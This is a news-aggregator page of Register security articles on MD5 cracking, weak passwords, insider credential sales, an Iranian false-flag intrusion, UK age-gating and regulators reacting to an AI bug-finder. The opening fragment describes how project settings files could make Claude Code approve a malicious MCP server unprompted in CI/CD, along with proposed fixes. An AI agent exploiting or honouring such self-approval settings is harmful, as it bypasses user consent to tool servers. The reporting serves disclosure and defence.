implement Claude Code. When Claude Code is invoked in CI/CD, that happens via SDK rather than the interactive CLI. So there's no terminal prompt. Malenkovich argues that Anthropic should make three changes. First, block enableAllProjectMcpServers, enabledMcpjsonServers, and permissions.allow from any settings file inside a project. The idea is that a malicious server should not be able to approve its own servers. Second, implement a dedicated MCP consent dialog that defaults to "deny." And third, require interactive consent per server rather than for all servers. Anthropic did not respond to a request for comment. ®
Categories: News

60% of MD5 password hashes are crackable in under an hour

The Register - Thu, 07/05/2026 - 17:47
It’s World Password Day, and there’s really no better way to celebrate than with news that a majority of supposedly secure password hashes can be cracked with a single GPU in less than an hour, some in less than a minute. Using a dataset of more than 231 million unique passwords sourced from dark web leaks - including 38 million added since its previous study - and hashing them with MD5, researchers at security firm Kaspersky found that, using a single Nvidia RTX 5090 graphics card, 60 percent of passwords could be cracked in less than an hour, and a full 48 percent in under 60 seconds. Sure, that’s not exactly your run-of-the-mill desktop graphics processor given its price, but it highlights an important point: It takes surprisingly little to crack the average password hash. Aspiring cybercriminals don’t even really need their own 5090, Kaspersky notes, as they can easily rent one from a cloud provider and crack hashes for a few bucks. The bottom line is that passwords protected only by fast hashing algorithms such as MD5 are no longer safe if attackers obtain them in a data breach. “One hour is all an attacker needs to crack three out of every five passwords they’ve found in a leak,” Kaspersky noted. Much of the reason password hashes have become so easy to crack is password predictability. Per Kaspersky, its analysis of more than 200 million exposed passwords revealed common patterns that attackers can use to optimize cracking algorithms, significantly reducing the time needed to guess the character combinations that grant access to target accounts. In case you’re wondering whether there’s a trend to compare this to, Kaspersky ran a prior iteration of this study in 2024, and bad news: Passwords are actually a bit easier to crack in 2026 than they were a couple of years ago. Not by much, mind you - only a few percent - but it’s still a move in the wrong direction. “Attackers owe this boost in speed to graphics processors, which grow more powerful every year,” Kaspersky explained. “Unfortunately, passwords remain as weak as ever.” How about a World Let’s-Stop-Relying-On Passwords Day? News of the death of the password has, unfortunately, been greatly exaggerated in the past couple of decades, yet most of us still rely on them multiple times a day. It likely won’t surprise El Reg readers to learn that us vultures are inundated with pitches for events like World Password Day, and most of them received this year had the same takeaway: We really need to get a move on with ditching passwords, or, at the very least, rethinking our security paradigms. Chris Gunner, a CISO-for-hire at managed service provider giant Thrive, told us in emailed comments that there’s no reason to ditch passwords entirely, but they need to be just one part of a broader identity-based security strategy. “Even a strong password can be undermined if the wider identity and access environment is not properly managed,” Gunner said. Passwords should be paired with a second factor, preferably biometric, said Gunner, because it’s the most difficult for hackers to bypass. “MFA controls should then be joined by identity governance and endpoint protection so gaps between systems are reduced,” Gunner added, recommending that a broader zero trust model be established as well, restricting lateral movement possibilities via a compromised account. Senior IEEE member and University of Nottingham cybersecurity professor Steven Furnell said that World Password Day messaging shouldn’t stop at telling people to improve their personal security posture either. Passwords aren’t going anywhere for a long while, Furnell explained in an email, and inconsistent adoption of new security technologies will mean users will be left at risk as certain providers fail to adapt. “Many sites and services still don’t offer passkey support, so users will find themselves with a mixed login experience,” Furnell explained. “While some might argue that it’s the user’s responsibility to protect themselves properly, they need to know how to do it.” The professor noted that, in many cases, users aren’t told how to create a good modern password, and in other cases, sites simply don’t enforce adequate password requirements to make passwords secure, to the degree that they can be made so. “This World Password Day, the main message ought not to be to the users, who often have no choice but to use passwords anyway, but to the sites and providers that are requiring them to do so,” Furnell told us. You heard the man - time to upgrade that user security stack. No matter how safe you think those passwords might be, with their complex requirements and proper hashed storage, it probably won’t take too long for someone to break in, making it an organizational responsibility to ensure there’s yet another locked door behind the first one. ®
Categories: News

The network password was a key plot point in one of the most famous movies of all time

The Register - Thu, 07/05/2026 - 10:49
PWNED Welcome back to PWNED, the weekly column where we turn a white hot spotlight onto the cracks and crevices in company security and write about those who have let their guard down, often in the name of convenience, incompetence, or just plain laziness. Today’s tale of woe concerns the need to secure a network and the dangers of an insecure password. Our story comes courtesy of Roger Grimes, CISO advisor at security firm KnowBe4. He recounts a time when he had to get into a client’s network but didn’t have the credentials. Grimes was installing accounting software for a client and, as a result, needed to take the network down for a day. To make sure that he didn’t disturb any work, he decided to log into the system on a Saturday. Unfortunately, he was missing the admin password he needed to uninstall old software and add the new app. Since it was the weekend, no one was answering their work phones to give him the information he needed, and there was a good chance he would have to delay the upgrade until the following weekend. Grimes could have given up right there, but he had an idea. Why not try to figure out what the password was? The situation reminded him of a movie. “You know, the scene where the hacker is sitting at the terminal trying to log on, but the victim refuses to give up credentials. So the hacker starts typing random passwords out of thin air,” he said. “And wouldn’t you know it? They correctly guess the password at the last possible moment.” After trying numerous passwords, the advisor thought about a famous movie he had just watched: Citizen Kane. He decided to try “rosebud,” and voilà. (This vulture can identify with the Orson Welles focus, having just watched The Third Man this week.) It’s a good thing that it was Grimes, a legit contractor, guessing passwords instead of some miscreant. Picking a password from a movie plotline is a bad idea and, in this case, made even worse by the lack of numbers, capital letters, or symbols in the password. If you’re picking out a password, you might be better off generating a strong password that’s a string of random numbers and letters and then having it remembered by a password manager. Then, for the password manager itself, consider a passphrase that contains capital letters, symbols, and numbers such as “Shoe-Please6-Wrapped-Carbon-Wear” so you can try to remember it. You might also use a passphrase for your admin password – you can generate a random one using Keeper’s Passphrase Generator. Have a story about someone leaving a gaping hole in their network? Share it with us at pwned@sitpub.com. Anonymity available upon request. ®
Categories: News

Arctic Wolf kicks 250 employees out of the pack to save money for AI

The Register - Wed, 06/05/2026 - 19:20
Cybersecurity vendor Arctic Wolf has laid off 250 workers in a restructuring that it says is designed to position the company to invest more in AI through its superintelligence platform and agentic Security Operations Center (SOC), a company spokesperson told The Register. “We recently made an organizational restructuring to better align the company’s structure and investments with our long‑term strategy,” a spokesperson said. “While these decisions are difficult, they position Arctic Wolf to operate more efficiently, continue investing in our Superintelligence platform and Agentic SOC, and deliver strong value to customers. We remain confident in our direction and momentum.” The layoffs appear to represent less than 10 percent of the total workforce. Arctic Wolf is a privately held company and does not publish a current headcount, but in December 2024, the company said it employed more than 2,600 workers, according to a press release it issued at the time. According to the website PitchBook, Arctic Wolf has 3,323 employees. The job cuts appeared to fall across several categories including sales, product development, and marketing. Some had been with the company for four years or more in revenue-generating roles such as sales engineer. One senior systems engineer with experience in datacenter infrastructure and cyber threat detection said on LinkedIn he was let go after more than a year with the company. “Wow! I was not expecting to have such a swing in posts this week from super positive to negative. Today I was laid off by Arctic Wolf due to restructuring,” wrote one sales engineer the day after he wrote a post about the success they had experienced last year. Alongside its five global SOCs, Arctic Wolf has offices in Waterloo, Ontario; San Antonio, Texas; Eden Prairie, Minnesota; Bengaluru, India, and other locations worldwide. Arctic Wolf operates in crowded endpoint detection and response (EDR) and managed detection and response (MDR) markets alongside CrowdStrike, Rapid7, and SentinelOne. It also competes for channel partners and customers with the likes of Huntress and Blackpoint Cyber. The company has bet on its Aurora Superintelligence Platform that combines security data, a “Swarm of Experts” AI agents and humans in the loop to protect customers' systems. ®
Categories: News

1 in 8 employees totally cool with selling work credentials

The Register - Wed, 06/05/2026 - 18:58
You can't trust anyone these days! Get together with seven of your colleagues, and there’s a decent chance one of the eight will say they’ve either sold company login details in the past year or know someone who has, says UK fraud prevention outfit Cifas. That 13 percent figure is shocking. Just as strikingly, Cifas found a similar 13 percent of employees overall believed selling access to company systems was justifiable, though the org’s Workplace Fraud Trends report did not spell out those justifications. Regardless, Cifas says it suggests that there’s a worrying shift happening among attitudes toward insider-enabled fraud that should trouble leadership. Then again, leadership might not be too worried based on the data. Cifas doesn’t give a precise number for the share of rank-and-file employees who feel selling credentials is justified, but it does call attention to how leadership feels, and the more power they have, the more they seem to think it’s okay to sell their access. Thirty-two percent of managers, 36 percent of directors, and 43 percent of C-suite executives said it was justifiable to sell their login details. Even more shockingly, a full 81 percent of business owners felt the exact same way. As for why, that’s not entirely clear, though Cifas told us it’s heard various excuses in the past. Financial challenges, the belief it would be a harmless one-off, confidence they wouldn’t get caught, and disgruntlement were among the reasons cited for selling credentials. If you’re wondering who to keep an eye on, Cifas suggests looking at IT and telecoms professionals, who showed the highest tolerance for fraud-related behavior across multiple scenarios covered in the study. Those scenarios included the aforementioned selling of login details, as well as secretly moonlighting for a competitor, using fraudulent references on job applications, expense fraud, and the like. Selling access to company systems was one of the less common types of fraud covered in the survey, but the 13 percent figure reflects respondents who said they had done it or knew someone who had - meaning that, in a company of 1,000 people, around 130 might report direct or indirect exposure to the behavior. The fact that leadership respondents and IT and telecoms professionals showed higher tolerance for such activity makes the findings more concerning, even if the survey focused specifically on selling login details, in some cases to a former colleague. This data is specific to the UK, mind you, but there’s no reason to assume a relaxed attitude toward such a critical cybersecurity weakness is confined to the Isles - that’s just as likely as the person buying those credentials keeping it to themselves. When asked if Cifas had comparable data from prior years to compare this to, the organization described its findings as revealing “a worrying shift in attitudes toward insider-enabled fraud.” However, the firm said that this is the first year it compiled this report, so it doesn’t have comparable data. Nonetheless, Cifas Director of Learning Rachael Tiffen said in a press release that the point is that organizations need to be aware of how many employees might be willing to sell access to company systems. “These findings show how vital it is for organisations to build fraud‑aware cultures, where employees at all levels understand their responsibilities and the consequences of their actions,” Tiffen said. Be sure to pay them well, too. ®
Categories: News

Iran cybersnoops still LARPing as ransomware crooks in espionage ops

The Register - Wed, 06/05/2026 - 17:03
Researchers at Rapid7 say that they have spotted what they believe was an Iranian intelligence cyber unit masquerading as the Chaos ransomware gang to hide a state-sponsored espionage operation. The intrusion was spotted earlier this year, and investigators say breadcrumbs left behind give them "medium confidence" in saying it was the work of MuddyWater, which has been linked to intrusions affecting Western government and banking networks in recent months. Attackers began with a Microsoft Teams phishing campaign, which is not uncommon. They also encouraged targets to share their screens. Again, it was nothing too out of the ordinary. However, what must have required some expert persuasion work was that they convinced these individuals to enter their credentials into local text files, and even modify MFA settings to allow attacker-controlled devices to complete authentication. Rapid7 researchers Alexandra Blia and Ivan Feigl wrote: "While connected, the [threat actor (TA)] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally-created text files. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access." From there, browser artifacts suggested that attackers lifted credentials through phishing pages. At least one mimicked a Microsoft Quick Assist page. Armed with valid credentials, the attackers then executed various commands via RDP, which downloaded payloads using curl. These payloads included a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp. Then it was a case of performing lateral movement by using additional compromised accounts and scooping up sensitive data along the way. The attackers used the same accounts to send emails internally notifying organization leaders about the intrusion and data theft, and included an onion link leading to Chaos ransomware’s data leak site (DLS), where a corresponding entry appeared with all data redacted and hidden behind a countdown timer. Follow-up emails aimed to build the illusion of a genuine ransomware attack, although the illusion was short-lived. The attackers instructed recipients to look for a file containing "access credentials" they could use to begin ransom negotiations. Unlike the plaintext credential files the attackers had socially engineered the original targets into creating, this file did not actually exist. There was no way to contact the attackers, whereas in a typical scenario the intruders would be looking for a payout. There was also no file encryption, which is inconsistent with Chaos affiliates' typical way of working. "Despite these inconsistencies in the initial proof-of-compromise, the TA later published the stolen data on its DLS in line with modern extortion tactics," Blia and Feigl wrote. "The leaked data was assessed to be legitimate." If not for financial gain, then what? MuddyWater – if that is indeed the group behind this – did not extort the organizations in question, nor did they deploy a ransomware payload, but they did pose as an established ransomware group. Rapid7 believes the group did this as an extension of its false-flag operations to provide a plausible front for cyberespionage activity, or preposition work to underpin potential destructive cyberattacks. It wouldn't be the first time MuddyWater or Iranian intelligence (MOIS) was found LARPing as a ransomware crew. Both have previously been linked to an attack on an Israeli hospital, allegedly carried out by a Qilin affiliate. "Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability," said the researchers. The unique benefits of masquerading as ransomware crooks include muddying attribution for attacks by leaving behind ransomware breadcrumbs, as well as redirecting defensive efforts toward locating signs of ransomware deployment instead of the backdoors that underpin espionage activity. ®
Categories: News

UK age-gating plans risk breaking the internet, privacy groups warn

The Register - Wed, 06/05/2026 - 14:03
Privacy groups, VPN providers, and civil liberties outfits have lined up to warn the UK government that its latest plan to slap age gates across swathes of the internet risks breaking the web while doing little to keep kids safe. In a joint statement, signatories including the Electronic Frontier Foundation, Mozilla, the Open Rights Group, Proton, and the Tor Project took aim at proposals now moving forward after the Children's Wellbeing and Schools Bill cleared Parliament, with access to some platforms, services, and specific features potentially restricted by age checks. "The open internet is a global public resource that has long since become foundational to the flourishing of individuals, businesses, and societies," the letter states, warning that "this openness and the opportunities it affords are coming under threat in the UK." Ministers are now consulting on measures that could include curfews for younger users and restrictions across services ranging from games and VPNs to static websites. The signatories say that will quickly turn into a system where everyone, not just children, has to prove their age to get full access. "Implementing such access restrictions hinges on all users having to verify their ages, not just young people," the letter warns, adding that the approach "focuses on restricting young people's access, rather than ensuring services are designed to uphold their rights and interests by default." Early results are not exactly inspiring. It's been months since tougher checks under the Online Safety Act began rolling out, and some systems have already been fooled by little more than a drawn-on mustache, raising questions about how effective the tech really is at keeping minors out. This hasn't gone unnoticed. "Existing age assurance technologies are either insufficiently accurate, undermine privacy and data security, or are not widely available across populations," the letter says, warning that rolling them out broadly "creates serious new security threats." It is not just a privacy headache either: the groups argue the policy could tilt the market further toward Big Tech. Mandating checks across more services risks "cementing the dominance of gatekeeper app stores, operating systems, and platforms' walled gardens," while turning the web into "a patchwork of age-gated jurisdictions." Instead of doubling down on access controls, the groups argue policymakers are targeting the wrong problem. "These risks are real and require thoughtful policy interventions that address the root of the issue, not just simplistic policies like access bans," the letter says, pointing to business models built on "massive collection of user data" as a bigger driver of harm. The closing line does not leave much room for interpretation: "Now is the time to hold tech to account, not undermine the open internet." ®
Categories: News

India orders infosec red alert in case Mythos sparks crime spree

The Register - Wed, 06/05/2026 - 03:32
India’s Securities and Exchange Board has advised participants in the nation’s equities industry to immediately revisit their information security systems and practices, in case Anthropic’s Mythos bug-finding AI sparks a cyberattack spree. The Board is India’s equivalent of the USA’s Securities and Exchange Commission, or the UK’s Financial Conduct Authority. On Tuesday, the Indian regulator issued an advisory that opens with the following observation: In response to those threats, the Board has established a taskforce that will examine the risks posed by models like Mythos, share threat intelligence, report incidents, and initiate a review of cybersecurity at third-party software vendors who supply the regulator and the entities it oversees. The advisory then offers some basic infosec advice: ensure patches are up to date, conduct audits of potential vulnerabilities, conduct inventories of APIs and secure them, run a serious SOC and take its advice, and harden systems by adopting principles such as zero-trust networking and running only essential services. The regulator also told participants in India’s equities markets to have their IT committees issue guidance on how to mitigate risks created by AI-led vulnerability detection models, then develop a plan to use AI as part of their infosec armoury. “Also, undertake other measures including recalibration of risks for AI accelerated threats, AI-augmented SOC transformation, and continuous vulnerability management using AI tools,” the advisory states. The Board directed the above advice at 19 different classes of company, ranging from venture capitalists to merchant bankers, mutual funds, stock exchanges, and even niche suppliers such as agencies that store know your customer information. Other regulators around the world have also acknowledged the risks Mythos poses. US Treasury Secretary Scott Bessent convened an emergency meeting with the nation’s banks a few weeks back. Singaporean regulators did likewise, yesterday. Australian regulators sent local banks a strongly worded reminder that they must develop AI strategies that consider risks the technology creates. Hong Kong’s Monetary Authority is working on new infosec guidance for the age of Mythos. India’s approach stands out for effectively putting entities it regulates on alert to an imminent threat and ordering them to take action to prevent problems. ®
Categories: News

India orders infosec red alert in case Mythos sparks crime spree

The Register - Wed, 06/05/2026 - 03:32
Securities regulator urges market players to develop new strategies and nail cyber-basics before AI models fuel mass attacks

India’s Securities and Exchange Board has advised participants in the nation’s equities industry to immediately revisit their information security systems and practices, in case Anthropic’s Mythos bug-finding AI sparks a cyberattack spree.…

Categories: News

Pages

Subscribe to Sec Tec Limited aggregator - News